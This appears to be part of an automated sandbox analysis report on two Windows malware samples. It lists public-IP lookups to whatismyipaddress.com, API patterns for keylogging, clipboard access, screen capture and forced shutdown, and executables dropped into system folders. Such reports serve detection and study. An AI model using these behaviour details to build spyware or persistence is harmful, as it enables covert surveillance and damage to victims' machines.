38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:41:05 GMTSet-Cookie: __cf_bm=L9ZRP8axm0tU__VmuLOhxu8CGxXdjdQqpRsZYn.FkzA-1728999650-1.0.1.1-FZjCQS4a00.yI2KAbXeR8X1BDQ1elTMPrDfNh8Pjoft02bGGUXT_zLhINCcGqU.necUnLQXr4jmkcg.N_AUOGA; path=/; expires=Tue, 15-Oct-24 14:10:50 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d303927fb620318-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:41:08 GMTSet-Cookie: __cf_bm=VxVcVL.bDTBTwsANTKK5hYvjky_kE9jqeEGOM8rC_ng-1728999653-1.0.1.1-i51nPqjDsVO5mvKMCy6Q6KaORH_RDD3IzJRoyXRz_XfADhj62xDY4hlpk9v7emruHT5NoCBSLVVGQEtKT0Ndqg; path=/; expires=Tue, 15-Oct-24 14:10:53 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d30393bdf37b3d9-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:41:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:41:18 GMTSet-Cookie: __cf_bm=qgCPNQUvA4T.cuX9sKX0Um1PtriHgV4WWFUpziUwxXA-1728999663-1.0.1.1-xPz__GkVFyYCwbohpRkZ38DVrzQqFLK87DxAEnqYExO85Tz2xdmqOlo4OYcjMUx9ex1Qa3z5o11wjzex6Zksmw; path=/; expires=Tue, 15-Oct-24 14:11:03 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d30397acb3874a2-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:41:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:41:22 GMTSet-Cookie: __cf_bm=kKmo4ROCqHNKLtwsO9p2yfQAbjF3Px2ckXqGlFgvJYA-1728999667-1.0.1.1-MBsL9KJP394uCiIBBbJeFsnWNcCkO_SuZzg_H1OysuvtKR_FzZvYdFGlmljjIIBLvu_zSabsndOdF4NqwL21hQ; path=/; expires=Tue, 15-Oct-24 14:11:07 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3039912c2e0a0e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: zjisvko.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: takyouhoymc.exe, takyouhoymc.exe, 00000013.00000000.208452330828.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000013.00000002.208453009696.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000015.00000000.208467251273.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000015.00000002.208467838534.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000016.00000000.208481029664.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000016.00000002.208519746880.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000017.00000000.208492207536.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000017.00000002.208493160917.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000018.00000000.208505933983.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000018.00000002.208506730015.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000019.00000000.208520152098.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000019.00000002.208521268464.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001A.00000000.208530811819.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001A.00000002.208570641746.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001C.00000002.208538250456.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001C.00000000.208537389886.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001D.00000000.208539397524.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001D.00000002.208540705118.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001E.00000000.208547520969.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001E.00000002.208548234455.000000000042A000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: zjisvko.exe, 00000004.00000002.208991705724.000000000019F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041394A OpenClipboard,WriteFile,EmptyClipboard,lstrlenA,GlobalAlloc,GlobalLock,lstrcpyA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0041394A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041394A OpenClipboard,WriteFile,EmptyClipboard,lstrlenA,GlobalAlloc,GlobalLock,lstrcpyA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0041394A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041394A OpenClipboard,WriteFile,EmptyClipboard,lstrlenA,GlobalAlloc,GlobalLock,lstrcpyA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0041394A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041394A OpenClipboard,WriteFile,EmptyClipboard,lstrlenA,GlobalAlloc,GlobalLock,lstrcpyA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0041394A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0041394A WriteFile,EmptyClipboard,lstrlenA,GlobalAlloc,GlobalLock,lstrcpyA,GlobalUnlock,SetClipboardData,19_2_0041394A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004139A0 IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,GlobalUnlock,CloseClipboard,2_2_004139A0
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00411356 GetWindowRect,GetWindowDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,DeleteDC,ReleaseDC,DeleteObject,2_2_00411356
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004095B5 Sleep,Sleep,Sleep,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowTextA,lstrlenA,lstrlenA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,Sleep,lstrcatA,lstrcatA,2_2_004095B5
Source: takyouhoymc.exeProcess created: 44
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeProcess Stats: CPU usage > 6%
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041EDCD PostQuitMessage,CreateThread,GetTickCount,lstrcpynA,lstrcpyA,wsprintfA,PostQuitMessage,NtdllDefWindowProc_A,2_2_0041EDCD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041EDCD PostQuitMessage,CreateThread,GetTickCount,lstrcpynA,lstrcpyA,wsprintfA,PostQuitMessage,NtdllDefWindowProc_A,4_2_0041EDCD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041EDCD PostQuitMessage,CreateThread,GetTickCount,lstrcpynA,lstrcpyA,wsprintfA,PostQuitMessage,NtdllDefWindowProc_A,5_2_0041EDCD
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetTickCount,Sleep,Sleep,GetTickCount,lstrcpyA,lstrlenA,lstrcatA,ShellExecuteA,CreateThread,GetTickCount,Sleep,Sleep,MessageBoxA,Sleep, shutdown -r2_2_00415D7A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetTickCount,Sleep,Sleep,GetTickCount,lstrcpyA,lstrlenA,lstrcatA,ShellExecuteA,CreateThread,GetTickCount,Sleep,Sleep,MessageBoxA,Sleep, Shutdown2_2_00415D7A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00413DD8 ExitWindowsEx,2_2_00413DD8
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetTickCount,Sleep,Sleep,GetTickCount,lstrcpyA,lstrlenA,lstrcatA,ShellExecuteA,CreateThread,GetTickCount,Sleep,Sleep,MessageBoxA,Sleep, shutdown -r4_2_00415D7A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetTickCount,Sleep,Sleep,GetTickCount,lstrcpyA,lstrlenA,lstrcatA,ShellExecuteA,CreateThread,GetTickCount,Sleep,Sleep,MessageBoxA,Sleep, Shutdown4_2_00415D7A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00413DD8 ExitWindowsEx,4_2_00413DD8
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetTickCount,Sleep,Sleep,GetTickCount,lstrcpyA,lstrlenA,lstrcatA,ShellExecuteA,CreateThread,GetTickCount,Sleep,Sleep,MessageBoxA,Sleep, shutdown -r5_2_00415D7A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetTickCount,Sleep,Sleep,GetTickCount,lstrcpyA,lstrlenA,lstrcatA,ShellExecuteA,CreateThread,GetTickCount,Sleep,Sleep,MessageBoxA,Sleep, Shutdown5_2_00415D7A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00413DD8 ExitWindowsEx,5_2_00413DD8
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\yrzsecpaticodwrc.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\fzicpocoiytgwqmyr.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\ojtoccrezqmarmjwql.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\zvgcrsiwskhwokiwrny.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\mjvsikbqngeunkjyurda.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\bzmkbewmkeduommczxkiz.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\SysWOW64\srfewatkjeewrqrigftsko.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\yrzsecpaticodwrc.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\fzicpocoiytgwqmyr.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\ojtoccrezqmarmjwql.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\zvgcrsiwskhwokiwrny.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\mjvsikbqngeunkjyurda.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\bzmkbewmkeduommczxkiz.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeFile created: C:\Windows\srfewatkjeewrqrigftsko.exeJump to behavior
